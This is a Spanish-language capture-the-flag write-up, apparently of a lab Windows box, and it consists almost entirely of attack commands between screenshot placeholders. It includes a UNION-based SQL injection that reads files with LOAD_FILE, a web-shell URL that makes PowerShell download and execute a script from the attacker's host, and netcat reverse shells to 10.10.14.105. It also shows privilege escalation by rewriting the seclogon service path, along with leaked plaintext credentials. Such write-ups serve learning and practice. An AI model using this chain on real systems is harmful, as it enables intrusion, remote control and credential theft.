nmap -A -p- -oA output 10.129.1.248 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.1.248

nmap -sU -O -p- -oA active-udp 10.129.1.248

nikto -h 10.129.1.248:80

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.248/FUZZ

Pasted image 20210902200953.png

Pasted image 20210816133925.png

Pasted image 20210902161556.png

Pasted image 20210902162042.png

whatweb 10.129.1.248

Pasted image 20210902162325.png

Pasted image 20210902172217.png

http://10.129.1.248

Pasted image 20210902172432.png

http://10.129.1.248/admin

Pasted image 20210902172620.png

Pasted image 20210902180119.png

Proxy->Options->Miscellaneous Escoger Dont send items to Proxy history or live tasks

Pasted image 20210902184549.png

Target->Scope->Include in scope Le damos click a Add y agregamos http://10.129.1.248

Pasted image 20210902184809.png

Proxy->Options-> Match and Replace Le damos click a Add y introducimos X-Forwarded-For:192.168.4.28 en Replace

Pasted image 20210902185215.png

productName=p' UNION SELECT TO_BASE64(LOAD_FILE('C:\\inetpub\\wwwroot\\admin.php')),2,3,4,5,6-- -

Pasted image 20210713150436.png

Copiamos el resultado y lo ponemos en "" en el comando de abajo un archivo php

echo -n "" | base64 > admin.php

hacemos lo mismo con database.php

Pasted image 20210713153248.png

Y vemos las credenciales de mariadb

Pasted image 20210713153330.png

nombre bd: warehouse usuariodb: manager password:l3tm3!n

Pasted image 20210902202035.png Pasted image 20210902202053.png

Pasted image 20210902201952.png

Hacemos un git clone Y modificamos la ultima fila del script Invoke-ConPtyShell.ps1 para que haga un reverse shell a la maquina atacante.

git clone https://github.com/antonioCoco/ConPtyShell

cd ConPtyShell

vim Invoke-ConPtyShell

![[Pasted image 20210902202739.png]] Pasted image 20210902202739.png

http://10.129.1.248/uploads/revshell.php?cmd=powershell IEX(New-Object Net.WebCllient).downloadString('http://10.10.14.125/Invoke-ConPtyShell.ps1')

python3 -m http.server 80

Pasted image 20210902203707.png

Empezamos con el reverse shell.

Pasted image 20210902203730.png

cd C:\Windows\Temp\privesc

locate nc.exe

python3 -m http.server 80

Pasted image 20210902210150.png

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smbsupport -username cu3rv0x -password password123

Pasted image 20210903090032.png

net use x: \\10.10.14.105\smbFolder /user:cu3rv0x password123

Pasted image 20210903085945.png

copy x:\nc.exe nc.exe

Pasted image 20210903090142.png

cp nc.exe C:\Windows\System32\spool\drivers\color\nc.exe

Pasted image 20210903090708.png

Pasted image 20210903093442.png

$user = 'fidelity\hector'

$password = 'l33th4x0rhector'

$secpw = ConvertTo-SecureString $password -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential $user,$secpw

Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock {C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443}

Pasted image 20210903093812.png

whoami /priv

Pasted image 20210903094243.png

cp WinPEASany.exe ContPyShell

cd ContPyshell

python3 -m http.server 80

Pasted image 20210903094722.png

net use y: \\10.10.14.105\smbFolder /user:cu3rv0x password123

Pasted image 20210903100612.png

copy y:\winPEASany.exe winpeas.exe

Pasted image 20210903100538.png

Vemos uno de los servicios que estan parados como seclogon

Pasted image 20210903101211.png

sc query seclogon

Pasted image 20210903101321.png

reg query "HKLM\system\currentcontrolset\services\seclogon"

Pasted image 20210903101419.png

reg add "HKLM\system\currentcontrolset\services\seclogon" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443" /f

nc lvnp 443

Pasted image 20210903101824.png

boxes

copyright©2022 Cu3rv0x all rights reserved